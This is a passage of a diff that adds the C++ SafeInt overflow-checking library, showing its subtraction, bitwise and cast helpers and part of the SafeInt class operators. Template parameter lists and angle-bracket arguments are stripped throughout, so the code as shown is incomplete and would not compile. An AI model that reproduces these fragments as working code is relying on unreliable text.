less, T __int64 + if (rhs >= 0) + { + // overflow not possible + result = (T)((__int64)lhs - rhs); + return true; + } + else + { + // we effectively have an addition + // which cannot overflow internally + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)(-rhs); + + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + + return false; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // U unsigned 32-bit or less, T __int64 + if (rhs >= 0) + { + // overflow not possible + result = (T)((__int64)lhs - rhs); + return; + } + else + { + // we effectively have an addition + // which cannot overflow internally + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)(-rhs); + + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is an __int64, rhs signed (up to 64-bit) + // we have essentially 4 cases: + // + // 1) lhs positive, rhs positive - overflow not possible + // 2) lhs positive, rhs negative - equivalent to addition - result >= lhs or error + // 3) lhs negative, rhs positive - check result <= lhs + // 4) lhs negative, rhs negative - overflow not possible + + __int64 tmp = (__int64)((unsigned __int64)lhs - (unsigned __int64)rhs); + + // Note - ideally, we can order these so that true conditionals + // lead to success, which enables better pipelining + // It isn't practical here + if ((lhs >= 0 && rhs < 0 && tmp < lhs) || // condition 2 + (rhs >= 0 && tmp > lhs)) // condition 3 + { + return false; + } + + result = (T)tmp; + return true; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is an __int64, rhs signed (up to 64-bit) + // we have essentially 4 cases: + // + // 1) lhs positive, rhs positive - overflow not possible + // 2) lhs positive, rhs negative - equivalent to addition - result >= lhs or error + // 3) lhs negative, rhs positive - check result <= lhs + // 4) lhs negative, rhs negative - overflow not possible + + __int64 tmp = (__int64)((unsigned __int64)lhs - (unsigned __int64)rhs); + + // Note - ideally, we can order these so that true conditionals + // lead to success, which enables better pipelining + // It isn't practical here + if ((lhs >= 0 && rhs < 0 && tmp < lhs) || // condition 2 + (rhs >= 0 && tmp > lhs)) // condition 3 + { + E::SafeIntOnOverflow(); + } + + result = (T)tmp; + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // lhs __int64, rhs any signed int (including __int64) + __int64 tmp = lhs - rhs; + + // we have essentially 4 cases: + // + // 1) lhs positive, rhs positive - overflow not possible in tmp + // 2) lhs positive, rhs negative - equivalent to addition - result >= lhs or error + // 3) lhs negative, rhs positive - check result <= lhs + // 4) lhs negative, rhs negative - overflow not possible in tmp + + if (lhs >= 0) + { + // if both positive, overflow to negative not possible + // which is why we'll explicitly check maxInt, and not call SafeCast + if ((IntTraits::isLT64Bit && tmp > IntTraits::maxInt) || (rhs < 0 && tmp < lhs)) + { + return false; + } + } + else + { + // lhs negative + if ((IntTraits::isLT64Bit && tmp < IntTraits::minInt) || (rhs >= 0 && tmp > lhs)) + { + return false; + } + } + + result = (T)tmp; + return true; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs __int64, rhs any signed int (including __int64) + __int64 tmp = lhs - rhs; + + // we have essentially 4 cases: + // + // 1) lhs positive, rhs positive - overflow not possible in tmp + // 2) lhs positive, rhs negative - equivalent to addition - result >= lhs or error + // 3) lhs negative, rhs positive - check result <= lhs + // 4) lhs negative, rhs negative - overflow not possible in tmp + + if (lhs >= 0) + { + // if both positive, overflow to negative not possible + // which is why we'll explicitly check maxInt, and not call SafeCast + if ((CompileConst::isLT64Bit>::Value() && tmp > IntTraits::maxInt) || + (rhs < 0 && tmp < lhs)) + { + E::SafeIntOnOverflow(); + } + } + else + { + // lhs negative + if ((CompileConst::isLT64Bit>::Value() && tmp < IntTraits::minInt) || + (rhs >= 0 && tmp > lhs)) + { + E::SafeIntOnOverflow(); + } + } + + result = (T)tmp; + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is a 32-bit int or less, rhs __int64 + // we have essentially 4 cases: + // + // lhs positive, rhs positive - rhs could be larger than lhs can represent + // lhs positive, rhs negative - additive case - check tmp >= lhs and tmp > max int + // lhs negative, rhs positive - check tmp <= lhs and tmp < min int + // lhs negative, rhs negative - addition cannot internally overflow, check against max + + __int64 tmp = (__int64)((unsigned __int64)lhs - (unsigned __int64)rhs); + + if (lhs >= 0) + { + // first case + if (rhs >= 0) + { + if (tmp >= IntTraits::minInt) + { + result = (T)tmp; + return true; + } + } + else + { + // second case + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + } + else + { + // lhs < 0 + // third case + if (rhs >= 0) + { + if (tmp <= lhs && tmp >= IntTraits::minInt) + { + result = (T)tmp; + return true; + } + } + else + { + // fourth case + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is a 32-bit int or less, rhs __int64 + // we have essentially 4 cases: + // + // lhs positive, rhs positive - rhs could be larger than lhs can represent + // lhs positive, rhs negative - additive case - check tmp >= lhs and tmp > max int + // lhs negative, rhs positive - check tmp <= lhs and tmp < min int + // lhs negative, rhs negative - addition cannot internally overflow, check against max + + __int64 tmp = (__int64)((unsigned __int64)lhs - (unsigned __int64)rhs); + + if (lhs >= 0) + { + // first case + if (rhs >= 0) + { + if (tmp >= IntTraits::minInt) + { + result = (T)tmp; + return; + } + } + else + { + // second case + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + } + else + { + // lhs < 0 + // third case + if (rhs >= 0) + { + if (tmp <= lhs && tmp >= IntTraits::minInt) + { + result = (T)tmp; + return; + } + } + else + { + // fourth case + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is any signed int32 or smaller, rhs is int64 + __int64 tmp = (__int64)lhs - rhs; + + if ((lhs >= 0 && rhs < 0 && tmp < lhs) || (rhs > 0 && tmp > lhs)) + { + return false; + // else OK + } + + result = (T)tmp; + return true; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is any signed int32 or smaller, rhs is int64 + __int64 tmp = (__int64)lhs - rhs; + + if ((lhs >= 0 && rhs < 0 && tmp < lhs) || (rhs > 0 && tmp > lhs)) + { + E::SafeIntOnOverflow(); + // else OK + } + + result = (T)tmp; + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is a 64-bit int, rhs unsigned int32 or smaller + // perform test as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if ((__int64)tmp <= lhs) + { + result = (T)(__int64)tmp; + return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is a 64-bit int, rhs unsigned int32 or smaller + // perform test as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if ((__int64)tmp <= lhs) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + // lhs is __int64, rhs is unsigned 32-bit or smaller + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // Do this as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if ((__int64)tmp <= IntTraits::maxInt && (__int64)tmp >= IntTraits::minInt) + { + result = (T)(__int64)tmp; + return true; + } + + return false; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // Do this as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if ((__int64)tmp <= IntTraits::maxInt && (__int64)tmp >= IntTraits::minInt) + { + result = (T)(__int64)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is any signed int, rhs unsigned int64 + // check against available range + + // We need the absolute value of IntTraits< T >::minInt + // This will give it to us without extraneous compiler warnings + const unsigned __int64 AbsMinIntT = (unsigned __int64)IntTraits::maxInt + 1; + + if (lhs < 0) + { + if (rhs <= AbsMinIntT - AbsValueHelper::method>::Abs(lhs)) + { + result = (T)(lhs - rhs); + return true; + } + } + else + { + if (rhs <= AbsMinIntT + (unsigned __int64)lhs) + { + result = (T)(lhs - rhs); + return true; + } + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is any signed int, rhs unsigned int64 + // check against available range + + // We need the absolute value of IntTraits< T >::minInt + // This will give it to us without extraneous compiler warnings + const unsigned __int64 AbsMinIntT = (unsigned __int64)IntTraits::maxInt + 1; + + if (lhs < 0) + { + if (rhs <= AbsMinIntT - AbsValueHelper::method>::Abs(lhs)) + { + result = (T)(lhs - rhs); + return; + } + } + else + { + if (rhs <= AbsMinIntT + (unsigned __int64)lhs) + { + result = (T)(lhs - rhs); + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // We run into upcasting problems on comparison - needs 2 checks + if (lhs >= 0 && (T)lhs >= rhs) + { + result = (T)((U)lhs - (U)rhs); + return true; + } + + return false; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // We run into upcasting problems on comparison - needs 2 checks + if (lhs >= 0 && (T)lhs >= rhs) + { + result = (T)((U)lhs - (U)rhs); + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const __int64& lhs, const unsigned __int64& rhs, __int64& result) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + // if we subtract, and it gets larger, there's a problem + // Perform test as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - rhs; + + if ((__int64)tmp <= lhs) + { + result = (__int64)tmp; + return true; + } + return false; + } + + template + static void SubtractThrow(const __int64& lhs, const unsigned __int64& rhs, T& result) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + // if we subtract, and it gets larger, there's a problem + // Perform test as unsigned to prevent unwanted optimizations + unsigned __int64 tmp = (unsigned __int64)lhs - rhs; + + if ((__int64)tmp <= lhs) + { + result = (__int64)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + // If lhs is negative, immediate problem - return must be positive, and subtracting only makes it + // get smaller. If rhs > lhs, then it would also go negative, which is the other case + static bool Subtract(const __int64& lhs, const unsigned __int64& rhs, T& result) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isInt64); + if (lhs >= 0 && (unsigned __int64)lhs >= rhs) + { + result = (unsigned __int64)lhs - rhs; + return true; + } + + return false; + } + + template + static void SubtractThrow(const __int64& lhs, const unsigned __int64& rhs, T& result) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isInt64); + if (lhs >= 0 && (unsigned __int64)lhs >= rhs) + { + result = (unsigned __int64)lhs - rhs; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +enum BinaryState +{ + BinaryState_OK, + BinaryState_Int8, + BinaryState_Int16, + BinaryState_Int32 +}; + +template +class BinaryMethod +{ +public: + enum + { + // If both operands are unsigned OR + // return type is smaller than rhs OR + // return type is larger and rhs is unsigned + // Then binary operations won't produce unexpected results + method = (sizeof(T) <= sizeof(U) || SafeIntCompare::isBothUnsigned || !IntTraits::isSigned) + ? BinaryState_OK + : IntTraits::isInt8 ? BinaryState_Int8 + : IntTraits::isInt16 ? BinaryState_Int16 : BinaryState_Int32 + }; +}; + +#ifdef SAFEINT_DISABLE_BINARY_ASSERT +#define BinaryAssert(x) +#else +#define BinaryAssert(x) SAFEINT_ASSERT(x) +#endif + +template +class BinaryAndHelper; + +template +class BinaryAndHelper +{ +public: + static T And(T lhs, U rhs) SAFEINT_NOTHROW { return (T)(lhs & rhs); } +}; + +template +class BinaryAndHelper +{ +public: + static T And(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs & rhs) == (lhs & (unsigned __int8)rhs)); + return (T)(lhs & (unsigned __int8)rhs); + } +}; + +template +class BinaryAndHelper +{ +public: + static T And(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs & rhs) == (lhs & (unsigned __int16)rhs)); + return (T)(lhs & (unsigned __int16)rhs); + } +}; + +template +class BinaryAndHelper +{ +public: + static T And(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs & rhs) == (lhs & (unsigned __int32)rhs)); + return (T)(lhs & (unsigned __int32)rhs); + } +}; + +template +class BinaryOrHelper; + +template +class BinaryOrHelper +{ +public: + static T Or(T lhs, U rhs) SAFEINT_NOTHROW { return (T)(lhs | rhs); } +}; + +template +class BinaryOrHelper +{ +public: + static T Or(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs | rhs) == (lhs | (unsigned __int8)rhs)); + return (T)(lhs | (unsigned __int8)rhs); + } +}; + +template +class BinaryOrHelper +{ +public: + static T Or(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs | rhs) == (lhs | (unsigned __int16)rhs)); + return (T)(lhs | (unsigned __int16)rhs); + } +}; + +template +class BinaryOrHelper +{ +public: + static T Or(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs | rhs) == (lhs | (unsigned __int32)rhs)); + return (T)(lhs | (unsigned __int32)rhs); + } +}; + +template +class BinaryXorHelper; + +template +class BinaryXorHelper +{ +public: + static T Xor(T lhs, U rhs) SAFEINT_NOTHROW { return (T)(lhs ^ rhs); } +}; + +template +class BinaryXorHelper +{ +public: + static T Xor(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs ^ rhs) == (lhs ^ (unsigned __int8)rhs)); + return (T)(lhs ^ (unsigned __int8)rhs); + } +}; + +template +class BinaryXorHelper +{ +public: + static T Xor(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs ^ rhs) == (lhs ^ (unsigned __int16)rhs)); + return (T)(lhs ^ (unsigned __int16)rhs); + } +}; + +template +class BinaryXorHelper +{ +public: + static T Xor(T lhs, U rhs) SAFEINT_NOTHROW + { + // cast forces sign extension to be zeros + BinaryAssert((lhs ^ rhs) == (lhs ^ (unsigned __int32)rhs)); + return (T)(lhs ^ (unsigned __int32)rhs); + } +}; + +/***************** External functions ****************************************/ + +// External functions that can be used where you only need to check one operation +// non-class helper function so that you can check for a cast's validity +// and handle errors how you like +template +inline bool SafeCast(const T From, U& To) SAFEINT_NOTHROW +{ + return SafeCastHelper::method>::Cast(From, To); +} + +template +inline bool SafeEquals(const T t, const U u) SAFEINT_NOTHROW +{ + return EqualityTest::method>::IsEquals(t, u); +} + +template +inline bool SafeNotEquals(const T t, const U u) SAFEINT_NOTHROW +{ + return !EqualityTest::method>::IsEquals(t, u); +} + +template +inline bool SafeGreaterThan(const T t, const U u) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan(t, u); +} + +template +inline bool SafeGreaterThanEquals(const T t, const U u) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan(u, t); +} + +template +inline bool SafeLessThan(const T t, const U u) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan(u, t); +} + +template +inline bool SafeLessThanEquals(const T t, const U u) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan(t, u); +} + +template +inline bool SafeModulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW +{ + return (ModulusHelper::method>::Modulus(t, u, result) == SafeIntNoError); +} + +template +inline bool SafeMultiply(T t, U u, T& result) SAFEINT_NOTHROW +{ + return MultiplicationHelper::method>::Multiply(t, u, result); +} + +template +inline bool SafeDivide(T t, U u, T& result) SAFEINT_NOTHROW +{ + return (DivisionHelper::method>::Divide(t, u, result) == SafeIntNoError); +} + +template +inline bool SafeAdd(T t, U u, T& result) SAFEINT_NOTHROW +{ + return AdditionHelper::method>::Addition(t, u, result); +} + +template +inline bool SafeSubtract(T t, U u, T& result) SAFEINT_NOTHROW +{ + return SubtractionHelper::method>::Subtract(t, u, result); +} + +/***************** end external functions ************************************/ + +// Main SafeInt class +// Assumes exceptions can be thrown +template +class SafeInt +{ +public: + SafeInt() SAFEINT_NOTHROW + { + C_ASSERT(NumericType::isInt); + m_int = 0; + } + + // Having a constructor for every type of int + // avoids having the compiler evade our checks when doing implicit casts - + // e.g., SafeInt s = 0x7fffffff; + SafeInt(const T& i) SAFEINT_NOTHROW + { + C_ASSERT(NumericType::isInt); + // always safe + m_int = i; + } + + // provide explicit boolean converter + SafeInt(bool b) SAFEINT_NOTHROW + { + C_ASSERT(NumericType::isInt); + m_int = (T)(b ? 1 : 0); + } + + template + SafeInt(const SafeInt& u) SAFEINT_CPP_THROW + { + C_ASSERT(NumericType::isInt); + *this = SafeInt((U)u); + } + + template + SafeInt(const U& i) SAFEINT_CPP_THROW + { + C_ASSERT(NumericType::isInt); + // SafeCast will throw exceptions if i won't fit in type T + SafeCastHelper::method>::template CastThrow(i, m_int); + } + + // The destructor is intentionally commented out - no destructor + // vs. a do-nothing destructor makes a huge difference in + // inlining characteristics. It wasn't doing anything anyway. + // ~SafeInt(){}; + + // now start overloading operators + // assignment operator + // constructors exist for all int types and will ensure safety + + template + SafeInt& operator=(const U& rhs) SAFEINT_CPP_THROW + { + // use constructor to test size + // constructor is optimized to do minimal checking based + // on whether T can contain U + // note - do not change this + *this = SafeInt(rhs); + return *this; + } + + SafeInt& operator=(const T& rhs) SAFEINT_NOTHROW + { + m_int = rhs; + return *this; + } + + template + SafeInt& operator=(const SafeInt& rhs) SAFEINT_CPP_THROW + { + SafeCastHelper::method>::template CastThrow(rhs.Ref(), m_int); + return *this; + } + + SafeInt& operator=(const SafeInt& rhs) SAFEINT_NOTHROW + { + m_int = rhs.m_int; + return *this; + } + + // Casting operators + + operator bool() const SAFEINT_NOTHROW { return !!m_int; } + + operator char() const SAFEINT_CPP_THROW + { + char val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator signed char() const SAFEINT_CPP_THROW + { + signed char val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator unsigned char() const SAFEINT_CPP_THROW + { + unsigned char val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator __int16() const SAFEINT_CPP_THROW + { + __int16 val; + SafeCastHelper<__int16, T, GetCastMethod<__int16, T>::method>::template CastThrow(m_int, val); + return val; + } + + operator unsigned __int16() const SAFEINT_CPP_THROW + { + unsigned __int16 val; + SafeCastHelper::method>::template CastThrow(m_int, + val); + return val; + } + + operator __int32() const SAFEINT_CPP_THROW + { + __int32 val; + SafeCastHelper<__int32, T, GetCastMethod<__int32, T>::method>::template CastThrow(m_int, val); + return val; + } + + operator unsigned __int32() const SAFEINT_CPP_THROW + { + unsigned __int32 val; + SafeCastHelper::method>::template CastThrow(m_int, + val); + return val; + } + + // The compiler knows that int == __int32 + // but not that long == __int32 + operator long() const SAFEINT_CPP_THROW + { + long val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator unsigned long() const SAFEINT_CPP_THROW + { + unsigned long val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator __int64() const SAFEINT_CPP_THROW + { + __int64 val; + SafeCastHelper<__int64, T, GetCastMethod<__int64, T>::method>::template CastThrow(m_int, val); + return val; + } + + operator unsigned __int64() const SAFEINT_CPP_THROW + { + unsigned __int64 val; + SafeCastHelper::method>::template CastThrow(m_int, + val); + return val; + } + +#if defined SAFEINT_USE_WCHAR_T || defined _NATIVE_WCHAR_T_DEFINED + operator wchar_t() const SAFEINT_CPP_THROW + { + wchar_t val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } +#endif + +#ifdef SIZE_T_CAST_NEEDED + // We also need an explicit cast to size_t, or the compiler will complain + // Apparently, only SOME compilers complain, and cl 14.00.50727.42 isn't one of them + // Leave here in case we decide to backport this to an earlier compiler + operator size_t() const SAFEINT_CPP_THROW + { + size_t val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } +#endif + + // Also provide a cast operator for floating point types + operator float() const SAFEINT_CPP_THROW + { + float val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + operator double() const SAFEINT_CPP_THROW + { + double val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + operator long double() const SAFEINT_CPP_THROW + { + long double val; + SafeCastHelper::method>::template CastThrow(m_int, val); + return val; + } + + // If you need a pointer to the data + // this could be dangerous, but allows you to correctly pass + // instances of this class to APIs that take a pointer to an integer + // also see overloaded address-of operator below + T* Ptr() SAFEINT_NOTHROW { return &m_int; } + const T* Ptr() const SAFEINT_NOTHROW { return &m_int; } + const T& Ref() const SAFEINT_NOTHROW { return m_int; } + + // Or if SafeInt< T, E >::Ptr() is inconvenient, use the overload + // operator & + // This allows you to do unsafe things! + // It is meant to allow you to more easily + // pass a SafeInt into things like ReadFile + T* operator&() SAFEINT_NOTHROW { return &m_int; } + const T* operator&() const SAFEINT_NOTHROW { return &m_int; } + + // Unary operators + bool operator!() const SAFEINT_NOTHROW { return (!m_int) ? true : false; } + + // operator + (unary) + // note - normally, the '+' and '-' operators will upcast to a signed int + // for T < 32 bits. This class changes behavior to preserve type + const SafeInt& operator+() const SAFEINT_NOTHROW { return *this; } + + // unary - + + SafeInt operator-() const SAFEINT_CPP_THROW + { + // Note - unsigned still performs the bitwise manipulation + // will warn at level 2 or higher if the value is 32-bit or larger + return SafeInt(NegationHelper::isSigned>::template NegativeThrow(m_int)); + } + + // prefix increment operator + SafeInt& operator++() SAFEINT_CPP_THROW + { + if (m_int != IntTraits::maxInt) + { + ++m_int; + return *this; + } + E::SafeIntOnOverflow(); + } + + // prefix decrement operator + SafeInt& operator--() SAFEINT_CPP_THROW + { + if (m_int != IntTraits::minInt) + { + --m_int; + return *this; + } + E::SafeIntOnOverflow(); + } + + // note that postfix operators have inherently worse perf + // characteristics + + // postfix increment operator + SafeInt operator++(int) SAFEINT_CPP_THROW // dummy arg to comply with spec + { + if (m_int != IntTraits::maxInt) + { + SafeInt tmp(m_int); + + m_int++; + return tmp; + } + E::SafeIntOnOverflow(); + } + + // postfix decrement operator + SafeInt operator--(int) SAFEINT_CPP_THROW // dummy arg to comply with spec + { + if (m_int != IntTraits::minInt) + { + SafeInt tmp(m_int); + m_int--; + return tmp; + } + E::SafeIntOnOverflow(); + } + + // One's complement + // Note - this operator will normally change size to an int + // cast in return improves perf and maintains type + SafeInt operator~() const SAFEINT_NOTHROW { return SafeInt((T)~m_int); } + + // Binary operators + // + // arithmetic binary operators + // % modulus + // * multiplication + // / division + // + addition + // - subtraction + // + // For each of the arithmetic operators, you will need to + // use them as follows: + // + // SafeInt c = 2; + // SafeInt i = 3; + // + // SafeInt i2 = i op (char)c; + // OR + // SafeInt i2 = (int)i op c; + // + // The base problem is that if the lhs and rhs inputs are different SafeInt types + // it is not possible in this implementation to determine what type of SafeInt + // should be returned. You have to let the class know which of the two inputs + // need to be the return type by forcing the other value to the base integer type. + // + // Note - as per feedback from Scott Meyers, I'm exploring how to get around this. + // 3.0 update - I'm still thinking about this. It can be done with template metaprogramming, + // but it is tricky, and there's a perf vs. correctness tradeoff where the right answer + // is situational. + // + // The case of: + // + // SafeInt< T, E > i, j, k; + // i = j op k; + // + // works just fine and no unboxing is needed because the return type is not ambiguous. + + // Modulus + // Modulus has some convenient properties - + // first, the magnitude of the return can never be + // larger than the lhs operand, and it must be the same sign + // as well. It does, however, suffer from the same promotion + // problems as comparisons, division and other operations + template + SafeInt operator%(U rhs) const SAFEINT_CPP_THROW + { + T result; + ModulusHelper::method>::template ModulusThrow(m_int, rhs, result); + return SafeInt(result); + } + + SafeInt operator%(SafeInt rhs) const SAFEINT_CPP_THROW + { + T result; + ModulusHelper::method>::template ModulusThrow(m_int, rhs, result); + return SafeInt(result); + } + + // Modulus assignment + template + SafeInt& operator%=(U rhs) SAFEINT_CPP_THROW + { + ModulusHelper::method>::template ModulusThrow(m_int, rhs, m_int); + return *this; + } + + template + SafeInt& operator%=(SafeInt rhs) SAFEINT_CPP_THROW + { + ModulusHelper::method>::template ModulusThrow(m_int, (U)rhs, m_int); + return *this; + } + + // Multiplication + template + SafeInt operator*(U rhs) const SAFEINT_CPP_THROW + { + T ret(0); + MultiplicationHelper::method>::template MultiplyThrow(m_int, rhs, ret); + return SafeInt(ret); + } + + SafeInt operator*(SafeInt rhs) const SAFEINT_CPP_THROW + { + T ret(0); + MultiplicationHelper::method>::template MultiplyThrow(m_int, (T)rhs, ret); + return SafeInt(ret); + } + + // Multiplication assignment + SafeInt& operator*=(SafeInt rhs) SAFEINT_CPP_THROW + { + MultiplicationHelper::method>::template MultiplyThrow(m_int, (T)rhs, m_int); + return *this; + } + + template + SafeInt& operator*=(U rhs) SAFEINT_CPP_THROW + { + MultiplicationHelper::method>::template MultiplyThrow(m_int, rhs, m_int); + return *this; + } + + template + SafeInt& operator*=(SafeInt rhs) SAFEINT_CPP_THROW + { + MultiplicationHelper::method>::template MultiplyThrow( + m_int, rhs.Ref(), m_int); + return *this; + } + + // Division + template + SafeInt operator/(U rhs) const SAFEINT_CPP_THROW + { + T ret(0); + DivisionHelper::method>::template DivideThrow(m_int, rhs, ret); + return SafeInt(ret); + } + + SafeInt operator/(SafeInt rhs) const SAFEINT_CPP_THROW + { + T ret(0); + DivisionHelper::method>::template DivideThrow(m_int, (T)rhs, ret); + return SafeInt(ret); + } + + // Division assignment + SafeInt& operator/=(SafeInt i) SAFEINT_CPP_THROW + { + DivisionHelper::method>::template DivideThrow(m_int, (T)i, m_int); + return *this; + } + + template + SafeInt& operator/=(U i) SAFEINT_CPP_THROW + { + DivisionHelper::method>::template DivideThrow(m_int, i, m_int); + return *this; + } + + template + SafeInt& operator/=(SafeInt i) + { + DivisionHelper::method>::template DivideThrow(m_int, (U)i, m_int); + return *this; + } + + // For addition and subtraction + + // Addition + SafeInt operator+(SafeInt rhs) const SAFEINT_CPP_THROW + { + T ret(0); + AdditionHelper::method>::template AdditionThrow(m_int, (T)rhs, ret); + return SafeInt(ret); + } + + template + SafeInt operator+(U rhs) const SAFEINT_CPP_THROW + { + T ret(0); + AdditionHelper::method>::template AdditionThrow(m_int, rhs, ret); + return SafeInt(ret); + } + + // addition assignment + SafeInt& operator+=(SafeInt rhs) SAFEINT_CPP_THROW + { + AdditionHelper::method>::template AdditionThrow(m_int, (T)rhs, m_int); + return *this; + } + + template + SafeInt& operator+=(U rhs) SAFEINT_CPP_THROW + { + AdditionHelper::method>::template AdditionThrow(m_int, rhs, m_int); + return *this; + } + + template + SafeInt& operator+=(SafeInt rhs) SAFEINT_CPP_THROW + { + AdditionHelper::method>::template AdditionThrow(m_int, (U)rhs, m_int); + return *this; + } + + // Subtraction + template + SafeInt operator-(U rhs) const SAFEINT_CPP_THROW + { + T ret(0); + SubtractionHelper::method>::template SubtractThrow(m_int, rhs, ret); + return SafeInt(ret); + } + + SafeInt operator-(SafeInt rhs) const SAFEINT_CPP_THROW + { + T ret(0); + SubtractionHelper::method>::template SubtractThrow(m_int, (T)rhs, ret); + return SafeInt(ret); + } + + // Subtraction assignment + SafeInt& operator-=(SafeInt rhs) SAFEINT_CPP_THROW + { + SubtractionHelper::method>::template SubtractThrow(m_int, (T)rhs, m_int); + return *this; + } + + template + SafeInt& operator-=(U rhs) SAFEINT_CPP_THROW + { + SubtractionHelper::method>::template SubtractThrow(m_int, rhs, m_int); + return *this; + } + + template + SafeInt& operator-=(SafeInt rhs) SAFEINT_CPP_THROW + { + SubtractionHelper::method>::template SubtractThrow(m_int, (U)rhs, m_int); + return *this; + } + + // Shift operators + // Note - shift operators ALWAYS return the same type as the lhs + // specific version for SafeInt< T, E > not needed - + // code path is exactly the same as for SafeInt< U, E > as rhs + + // Left shift + // Also, shifting > bitcount is undefined - trap in debug +#ifdef SAFEINT_DISABLE_SHIFT_ASSERT +#define ShiftAssert(x) +#else +#define ShiftAssert(x) SAFEINT_ASSERT(x) +#endif + + template + SafeInt operator<<(U bits) const SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || bits >= 0); + ShiftAssert(bits < (int)IntTraits::bitCount); + + return SafeInt((T)(m_int << bits)); + } + + template + SafeInt operator<<(SafeInt bits) const SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || (U)bits >= 0); + ShiftAssert((U)bits < (int)IntTraits::bitCount); + + return SafeInt((T)(m_int << (U)bits)); + } + + // 